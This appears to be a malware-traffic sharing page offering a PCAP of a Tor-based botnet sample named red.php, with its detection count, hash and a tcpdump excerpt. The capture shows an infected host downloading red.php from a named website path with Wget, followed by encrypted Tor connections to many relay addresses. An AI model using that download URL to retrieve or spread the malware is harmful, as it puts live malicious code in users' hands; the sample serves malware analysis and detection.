TOR Malware Botnet red.php PCAP file download traffic sample

Download Attachments

  • 1 pcap torbotnet
    torbotnet
    Date added: January 26, 2018 5:50 am Added by: admin File size: 755 KB Downloads: 132
10 engines detected this file
SHA-256 9b606e8e8e7ada9da2afdd3cea20d777f84da9f8b148a58385890e44743f733d
File name red.php
File size 488 KB
Last analysis 2018-01-25 22:27:42 UTC

2018-01-25 22:23:49.279103 IP 192.168.1.102.52977 > 62.149.140.171.80: Flags [P.], seq 0:154, ack 1, win 256, length 154: HTTP: GET /agenti/red.php HTTP/1.1
E…%M@…G….f>……P.U7
. 5.P…W…GET /agenti/red.php HTTP/1.1
User-Agent: Wget/1.19.4 (mingw32)
Accept: */*
Accept-Encoding: identity
Host: www.gefrost.com
Connection: Keep-Alive

2018-01-25 22:26:51.138603 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 0:245, ack 1, win 256, length 245
E…5\@…q….f.m…….O.(.AC.P……………….=~.O>…zw..\=..:….3..7.P.=.Z..H.
…….9.8…….5… …..E.D.3.2………..A…../……………
…..{…&.$..!www.yyag3ou3uyxj6ywhd47kon5ot.com………
……………………… .
… ……………………………….
2018-01-25 22:26:51.267376 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 245:379, ack 1022, win 252, length 134
E…5]@…q….f.m…….O…AG.P…y…….F…BA…. S………….rEe.C..c.+Q.G…ytg=…F.[R(..WdU…..u.._{………….0……..S……%._.x.B.^U.5…._.. .r…..u9K.~1
2018-01-25 22:26:51.384411 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 379:453, ack 1081, win 252, length 74
E..r5^@…q….f.m…….O…AGFP……….. N.!….ab.o…L.m.S.u.(…..B……. . .sFs.B.ZK.|-…’m.>..
……..
2018-01-25 22:26:51.501192 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [.], ack 3203, win 256, length 0
E..(5_@…r …f.m…….O…AO.P…A………
2018-01-25 22:26:51.502723 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 453:1039, ack 3203, win 256, length 586
E..r5`@…o….f.m…….O…AO.P….2…… y.[.?w…..<..{..t’..p…I…..#…. .^…….x}……f…6.gq….k..Q….E/^.zz…i./B….R.Y.!……5b..x].f..t.,…..W.z….L…….T;.^A.d.h.^g….o.X..Q.:..=….K)a…..D”..
.U.O…..`v…..0.g. …~.\;..lj.y.ZEm..}..(..r..|..p..c….mP….J…_……b.#..u.w….. ,..a?xQz………….[?DSY.’i…….w.E%#.M. ..&…(…^’-…:)U.i…T|..$..u./g.u…qQ..F…_.N………=……R…..k……e..f……….l……..-….. T8..Yv………j.VM……1..F.w..H..C U..WK…A..}.zPI..i.O..P.2+.s…V.}. ..n\..R..Yw..SZ5…….^2…c..9..n.]…P..’.P.s…lLl….|O.1.O/.. ..[….Z….I
2018-01-25 22:26:51.666011 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 1039:1625, ack 3203, win 256, length 586
E..r5a@…o….f.m…….O.7.AO.P……….. .(.n…..)U85..7<..^…9…K)……. ..^E.h`.i mM……..fq.R.H..?]…..:……sI.y…!{.. g..?G8.Op.J.x.?S\…….^OV.((c…..3_.~.g…..~..?(.O….n….=.Z…..B..lH.|x;…..^.(z…*…kI..@.;…`&.’..L….. ..C……#)…..e…qYBh….q5AH….c;>{1.9…u.xHgM7.8m.$H%..3.H. .2.J..v>..T.G.y#..fU..<.~….7[..L^.:….c…..#.]4..o….c..i.v|>…..|_#4W.s… .;.R.Ile..
..8….!….e[/a%\$.d}.5……f…H…CV..!./….e^<:….w2Q…..Y…..’…..X&`
9….mj..<c7..;..K…+……<G…..ND…a…Q).O…()..&Gkl…L…..sG:/#^./.H.5…..s..w6..K…<.0m..4?..y{-+….=…-k.j.S.l.|.
2018-01-25 22:26:51.791615 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 1625:2211, ack 3789, win 254, length 586
E..r5b@…o….f.m…….O…AQ.P….X…… …….[1.%e.s!….,YMM.G….w\o…. ..dc..”..[…..~..}.;.m .S……]….x…9….Z )o.w..^.S…….-s….e….<F.j9….’..9.2..|R….1.’.5….;…..`…q.+…..}.7…s.|h\L.%….v.Q…!IS..~.KTzA…(n.?T..<………X.bavp…a.. …?.i…..\.u.`’..7….[…..n`.A.!s
.N`f……lp……..YF]..q…..$9…<.<..h.k..hf./…+.f…….7(.p…….h..$…ql..(……0…[..P…S<.U..t..|.@;+.W~.C….tt..y.D.s…v.L…|.*\….q<…….Jy..~&X>XX4.$……….G………/.gx..q[.J.y. }..2….i…*..}.

2018-01-25 22:26:54.392040 IP 192.168.1.102.53021 > 178.62.242.202.443: Flags [P.], seq 376:450, ack 800, win 253, length 74
E..r(.@…jw…f.>……..;..u).P…d_…… ………. =e”n.a…&h.0%.G.G..M…. R^I.D..EdM..b.Q..d..”…=|PP….
2018-01-25 22:26:54.392243 IP 192.168.1.102.52991 > 80.131.252.113.9001: Flags [P.], seq 363:437, ack 1061, win 255, length 74
E..r..@……..fP..q..#).J..8\.vP…v……. ..B..Mj.j.%w.K..Yj.=#.-..S3.,IQ….. …HT..4_4…V^….]..+.9.r. .c.
2018-01-25 22:26:54.396617 IP 192.168.1.102.52992 > 163.172.160.227.4443: Flags [P.], seq 373:447, ack 810, win 253, length 74
E..rAe@……..f…….[…..4..P……….. ….9..m.Z……#j..8$…t………. ….o…Yw…….S../O..)%v7.=..
2018-01-25 22:26:54.398013 IP 192.168.1.102.53001 > 85.25.44.141.443: Flags [P.], seq 359:433, ack 1070, win 256, length 74
E..r
.@……..fU.,.. …..53…P……….. …..mM..+v….\.>…._..H.mB……. 0Q..4.s{…
..}… .Tt..0.V+G..W
2018-01-25 22:26:54.401420 IP 192.168.1.102.53008 > 50.7.151.47.443: Flags [P.], seq 375:449, ack 1073, win 256, length 74
E..r..@…_{…f2../……/.6″@.P……….. .l..a..c…C….H.T.O.2..g<…F…..
.@o.L.u…..0……..y…….V.
2018-01-25 22:26:54.406334 IP 192.168.1.102.53023 > 52.60.215.15.9001: Flags [.], ack 2219717773, win 256, length 0
E..(7o@……..f4<….#)…R.N4.P………….
2018-01-25 22:26:54.407021 IP 192.168.1.102.53023 > 52.60.215.15.9001: Flags [P.], seq 0:242, ack 1, win 256, length 242
E…7p@……..f4<….#)…R.N4.P…<g………….bZ\..%……….<.T.l.)
..m..#!…H.
…….9.8…….5… …..E.D.3.2………..A…../……………
…..x…#.!…www.ynygqwwqqmfl2rebqcgqwb.com………
……………………… .
… ……………………………….
2018-01-25 22:26:54.408539 IP 192.168.1.102.53009 > 136.243.243.6.1444: Flags [P.], seq 367:441, ack 1062, win 252, length 74
E..r.@@….=…f……..}..r….P…n……. .R….-..#*$.J. ……0m…e..6….. …f.n/$6…..>…l i.Q0{.f..e.R
2018-01-25 22:26:54.416602 IP 192.168.1.102.52999 > 212.83.154.33.443: Flags [P.], seq 367:441, ack 1063, win 252, length 74
E..rB.@……..f.S.!………..bP……….. .SW..L^[.D.’..H.5.)..o4……Z…… …h….ib…….@.a……Q….W
2018-01-25 22:26:54.418368 IP 192.168.1.102.53015 > 130.255.190.187.14400: Flags [P.], seq 370:444, ack 801, win 253, length 74
E..r\`@….\…f……8@.e.L|…P……….. .h…\.85w$b….r..H]P.).v..x……. …hK;yj…aT…….-6. …|.]#p
2018-01-25 22:26:54.422033 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 5009, win 256, length 0
E..(x.@…?….f…’..#-v.;..`..P…%………
2018-01-25 22:26:54.422405 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 9389, win 256, length 0
E..(x.@…?….f…’..#-v.;..`..P………….
2018-01-25 22:26:54.422623 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 12309, win 256, length 0
E..(x.@…?….f…’..#-v.;..`..P………….
2018-01-25 22:26:54.422804 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 13769, win 256, length 0
E..(x.@…?….f…’..#-v.;..a.7P………….
2018-01-25 22:26:54.423367 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 16689, win 256, length 0
E..(x.@…?….f…’..#-v.;..a..P….n……..
2018-01-25 22:26:54.440414 IP 192.168.1.102.52997 > 185.86.151.168.443: Flags [P.], seq 241:375, ack 999, win 252, length 134
E…c.@……..f.V……..Pt..t4P…7…….F…BA…U…Q].0.]..D..Z…..\..vTk.11|..r……8..T…1…5.F.}…………….06.F.i…z…7o.}…
…c..FuS..G.. }…..M..J…

Share

Leave a Reply